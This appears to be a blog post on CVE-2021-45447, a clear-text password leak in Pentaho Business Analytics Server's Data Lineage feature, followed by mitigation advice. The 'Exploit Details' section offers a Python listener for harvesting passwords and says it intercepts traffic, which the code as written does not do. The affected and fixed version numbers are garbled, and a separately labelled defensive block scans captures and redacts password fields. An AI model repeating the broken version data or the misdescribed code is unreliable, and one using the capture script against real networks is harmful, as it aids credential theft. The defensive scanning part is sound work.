A critical security vulnerability has been discovered in Hitachi Vantara Pentaho Business Analytics Server (CVE-2021-45447). This vulnerability affects versions before 9.3.., 9.2..2, and 8.3..25. If you are running one of these versions and the Data Lineage feature is enabled, you may be at risk. The issue enables the transmission of database passwords in clear text, allowing unauthorized actors to potentially gain access to sensitive data or launch additional attacks.

This blog post will provide an overview of the vulnerability, its exploit details, and how you can protect your systems by updating to the latest secure version of Hitachi Vantara Pentaho Business Analytics Server.

Vulnerability Details

The issue lies within the Data Lineage feature of Hitachi Vantara Pentaho Business Analytics Server. When enabled on an affected version, this feature transmits database passwords in clear text. Anyone positioned to observe that network traffic can read the passwords and use them to gain unauthorized access to systems or data.

The vulnerability was assigned CVE-2021-45447 and was given a critical rating due to the ease of exploitation and the severity of the potential impact.

Exploit Details

An attacker with the ability to intercept or sniff network traffic can potentially exploit this vulnerability. The attacker can obtain sensitive information, such as database passwords, transmitted in clear text by the Data Lineage feature. Once they have these credentials, they can use them to access the affected systems, leading to further unauthorized access or data breaches.

A simple Python script could be used to capture the clear text passwords:

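import re
import socket

def capture_passwords(host, port):
    # Listen for incoming TCP connections on the given address
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((host, port))
    server.listen()

    while True:
        client, _ = server.accept()
        # Close each connection once its data has been read
        with client:
            data = client.recv(2048)
        # Match a "Password=<value>;" field, stopping at the first semicolon
        password = re.search(r'Password=([^;]*);', data.decode('utf-8', errors='replace'))
        if password:
            print(f'Password captured: {password.group(1)}')

capture_passwords('...', 808)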

This code would listen on the specified IP and port and print any captured passwords.

Mitigation Steps

To protect your systems from this vulnerability, first verify whether your Hitachi Vantara Pentaho Business Analytics Server version is affected by the vulnerability:

If your system is affected, follow the recommendations below:

1. Update your Hitachi Vantara Pentaho Business Analytics Server to the latest secure version (9.3.., 9.2..2, or 8.3..25).

- Hitachi Vantara Pentaho Business Analytics Server Download
- Hitachi Vantara Pentaho Business Analytics Server Documentation
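
After updating, captured traffic or logs can be checked for leftover clear text password fields. The following is an added example, not code from the original post or from Hitachi Vantara. It assumes the "Password=<value>;" field format used by the script above; the function names and sample payloads are constructed for illustration.

```python
import hashlib
import re

# Assumed field format: the "Password=<value>;" pattern used by the script
# earlier on this page. The real lineage payload format is not shown there.
CRED_FIELD = re.compile(rb"(?i)\b(password|pwd)\s*=\s*([^;\r\n]*)")


def find_cleartext_passwords(payload: bytes):
    """Return one finding per non-empty password field, never the value itself."""
    findings = []
    for m in CRED_FIELD.finditer(payload):
        value = m.group(2).strip()
        if not value or set(value) <= {ord("*")}:
            continue  # empty or already masked, nothing leaked
        findings.append({
            "offset": m.start(),
            "field": m.group(1).decode("ascii"),
            "length": len(value),
            # Short digest lets responders match a finding to a known
            # credential for rotation without logging the secret.
            "sha256_prefix": hashlib.sha256(value).hexdigest()[:12],
        })
    return findings


def redact(payload: bytes) -> bytes:
    """Mask password values so the capture can be stored or shared."""
    return CRED_FIELD.sub(lambda m: m.group(1) + b"=<redacted>", payload)


# Constructed sample payloads (not real Pentaho traffic).
SAMPLES = {
    "before-update": b"Server=db01;User=etl;Password=S3cr3t!;Database=sales;",
    "masked": b"Server=db01;User=etl;Password=****;Database=sales;",
    "no-trailing-semicolon": b"user=etl;PWD=hunter2",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        hits = find_cleartext_passwords(data)
        print(name, "LEAK" if hits else "ok", hits, redact(data))
```

Any credential that produces a finding should be treated as exposed and rotated, since it may already have been observed on the network.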

Summary

CVE-2021-45447 poses a critical threat to systems running affected versions of Hitachi Vantara Pentaho Business Analytics Server with the Data Lineage feature enabled. The transmission of database passwords in clear text can lead to unauthorized access and potential data breaches. To mitigate the risk, it is crucial to update the software to a secure version and ensure that sensitive data is no longer transmitted in clear text.

Timeline

Published on: 11/02/2022 15:15:00 UTC
Last modified on: 11/04/2022 13:28:00 UTC